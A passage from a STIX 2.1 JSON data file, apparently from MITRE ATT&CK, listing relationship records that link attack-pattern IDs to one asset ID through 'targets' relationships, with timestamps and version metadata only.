"modified": "2024-07-01T10:37:15.831918", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b5e7188c-420e-4ed5-87df-e81f1f33ff3d", "created": "2024-07-01T10:37:15.831926", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831928", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb125d40-0b2d-41ac-a71a-3229241c2cd3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3b1f6303-583e-44b2-bc69-da2e8800a18c", "created": "2024-07-01T10:37:15.831937", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831939", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb2cb5cb-ae87-4de0-8c35-da2a17aafb99", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--68175bd1-9d9c-4b00-b32f-3c26164b8cf5", "created": "2024-07-01T10:37:15.831947", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831949", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eb897572-8979-4242-a089-56f294f4c91d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--3f36d932-1bb2-4ee1-8d7c-cfb38a0f0326", "created": "2024-07-01T10:37:15.831957", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831959", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ebb42bbe-62d7-47d7-a55f-3b08b61d792d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cc8faf8f-b1f5-4688-aae5-8f4c7279f566", "created": "2024-07-01T10:37:15.831967", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831969", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ebbe170d-aa74-4946-8511-9921243415a3", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b7ddf364-75fd-4968-8bad-33ec861934fc", "created": "2024-07-01T10:37:15.831977", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831979", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ec8fc7e2-b356-455c-8db5-2e37be158e7d", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8735e2b-19b6-4516-9d7b-914d4f2c3ccd", "created": "2024-07-01T10:37:15.831987", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.831989", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ed7efd4d-ce28-4a19-a8e6-c58011eb2c7a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cd6f572b-a950-4757-b99a-e5f2142d2a89", "created": "2024-07-01T10:37:15.831997", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832000", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--edf91964-b26e-4b4a-9600-ccacd7d7df24", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--02f49606-1982-4f50-97fd-39b1e1315298", "created": "2024-07-01T10:37:15.832008", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832010", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--eec23884-3fa1-4d8a-ac50-6f104d51e235", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--7139de46-0382-404f-b25b-19d2dbe4917d", "created": "2024-07-01T10:37:15.832018", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832020", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ef67e13e-5598-4adc-bdb2-998225874fa9", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--bc0a2a7b-4a8b-4b2e-86be-78f5cfc4166a", "created": "2024-07-01T10:37:15.832027", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832030", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f0589bc3-a6ae-425a-a3d5-5659bfee07f4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--935c66f1-7cc5-4ce4-b225-12b3f520f8b6", "created": "2024-07-01T10:37:15.832038", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832040", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f1951e8a-500e-4a26-8803-76d95c4554b4", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--57efb92d-5890-4779-bf61-e3763fb18022", "created": "2024-07-01T10:37:15.832048", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832050", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f244b8dd-af6c-4391-a497-fc03627ce995", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--510bd73d-1fdf-4602-9bac-237cde710829", "created": "2024-07-01T10:37:15.832058", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832060", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f24faf46-3b26-4dbb-98f2-63460498e433", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c6fa4e93-c361-4376-a53f-bc86f5f11730", "created": "2024-07-01T10:37:15.832068", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832070", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f2857333-11d4-45bf-b064-2c28d8525be5", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5037c347-9332-42e6-9283-ea197c2bc06e", "created": "2024-07-01T10:37:15.832078", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832080", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f2877f7f-9a4c-4251-879f-1224e3006bee", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--2d91d645-3887-4967-b452-601fb199b559", "created": "2024-07-01T10:37:15.832088", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832090", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f303a39a-6255-4b89-aecc-18c4d8ca7163", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a100a1c6-d7e0-4a6f-b4ba-1d40ce177cf4", "created": "2024-07-01T10:37:15.832098", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832100", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--75b4e541-56bd-48e1-b8d0-576558c87230", "created": "2024-07-01T10:37:15.832108", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832110", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f3d95a1f-bba2-44ce-9af7-37866cd63fd0", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c3b5e2b3-4cc8-42e5-bc43-b8262adfedb5", "created": "2024-07-01T10:37:15.832118", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832120", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4599aa0-4f85-4a32-80ea-fc39dc965945", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--79a6c0cd-a14e-42c2-bd0d-ee9e083c6c61", "created": "2024-07-01T10:37:15.832128", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832130", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f4c1826f-a322-41cd-9557-562100848c84", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--15ca9a44-ad47-48a7-8ead-4e62d2c7491d", "created": "2024-07-01T10:37:15.832138", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832140", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5946b5e-9408-485f-a7f7-b5efc88909b6", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--c8426412-b0d6-4ea8-9859-3d9dc650e431", "created": "2024-07-01T10:37:15.832147", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832150", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5bb433e-bdf6-4781-84bc-35e97e43be89", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--5ba63a8a-9f2b-4b95-a177-2f3df7d1d987", "created": "2024-07-01T10:37:15.832158", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832160", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f5d8eed6-48a9-4cdf-a3d7-d1ffa99c3d2a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d98a5d53-6ab3-4e77-8400-3cbb898cdb18", "created": "2024-07-01T10:37:15.832168", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832170", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--9d598b27-bff6-4b4e-be7a-152370565657", "created": "2024-07-01T10:37:15.832178", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832180", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6ad61ee-65f3-4bd0-a3f5-2f0accb36317", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--caa856f5-ee6a-47fe-a1ed-01158fd9f31a", "created": "2024-07-01T10:37:15.832188", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832190", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--d2df6c00-4825-4915-9e12-7a1c3652d69b", "created": "2024-07-01T10:37:15.832197", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832200", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f6fe9070-7a65-49ea-ae72-76292f42cebe", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--78d7510c-6b63-4636-8040-4008f802f54b", "created": "2024-07-01T10:37:15.832207", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832209", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7827069-0bf2-4764-af4f-23fae0d181b7", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0e623d2a-21c5-4332-8eee-bac9065addcc", "created": "2024-07-01T10:37:15.832217", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832220", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f7c0689c-4dbd-489b-81be-7cb7c7079ade", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--a8be10b6-dc3f-4272-8e27-f37e23b16b55", "created": "2024-07-01T10:37:15.832227", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832229", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--f9e9365a-9ca2-4d9c-8e7c-050d73d1101a", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--cf05c49e-f638-41be-8dd3-9a2419a0816b", "created": "2024-07-01T10:37:15.832237", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832240", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb640c43-aa6b-431e-a961-a279010424ac", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--81ef9165-1868-4f37-8f73-c986e9e8b78d", "created": "2024-07-01T10:37:15.832248", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832250", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fb8d023d-45be-47e9-bc51-f56bcae6435b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--757126af-d255-47e1-b2eb-89d75cb99d5b", "created": "2024-07-01T10:37:15.832258", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832260", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fdc47f44-dd32-4b99-af5f-209f556f63c2", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--211172b3-2ac3-46df-aa83-1e2c5f155362", "created": "2024-07-01T10:37:15.832267", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832269", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--fe926152-f431-4baf-956c-4ad3cb0bf23b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--b726c349-c930-46bb-9626-1a680f89d9cb", "created": "2024-07-01T10:37:15.832277", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832279", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff25900d-76d5-449b-a351-8824e62fc81b", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--0f17ee77-c7d5-4277-8fb5-7a5fe7d32de1", "created": "2024-07-01T10:37:15.832288", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832290", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ff73aa03-0090-4464-83ac-f89e233c02bc", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--4796a6ea-6630-4971-b048-6c8b5686e15e", "created": "2024-07-01T10:37:15.832298", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832300", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffbcfdb0-de22-4106-9ed3-fc23c8a01407", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--fa8e7f61-7463-4b0f-9c17-ec6f1771a2c5", "created": "2024-07-01T10:37:15.832308", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832310", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffe59ad3-ad9b-4b9f-b74f-5beb3c309dc1", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--f2997a01-b196-492f-81f3-02dd7f6f9b96", "created": "2024-07-01T10:37:15.832318", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832320", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--ffeb0780-356e-4261-b036-cfb6bd234335", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "x_mitre_deprecated": false, "x_mitre_version": "0.1", "x_mitre_attack_spec_version": "3.2.0"}, {"type": "relationship", "spec_version": "2.1", "id": "relationship--129a95f8-411d-48cf-bd50-27973682d293", "created": "2024-07-01T10:37:15.832328", "created_by_ref": "identity--6e4a3b8d-cbfc-491a-b7bf-ce6bec385264", "revoked": false, "external_references": [], "object_marking_refs": [], "modified": "2024-07-01T10:37:15.832330", "description": "", "relationship_type": "targets", "source_ref": "attack-pattern--005cc321-08ce-4d17-b1ea-cb5275926520", "target_ref": "x-mitre-asset--14932ed5-1098-4cc1-9f57-159ab7366787", "x_mitre_modified_by_ref": 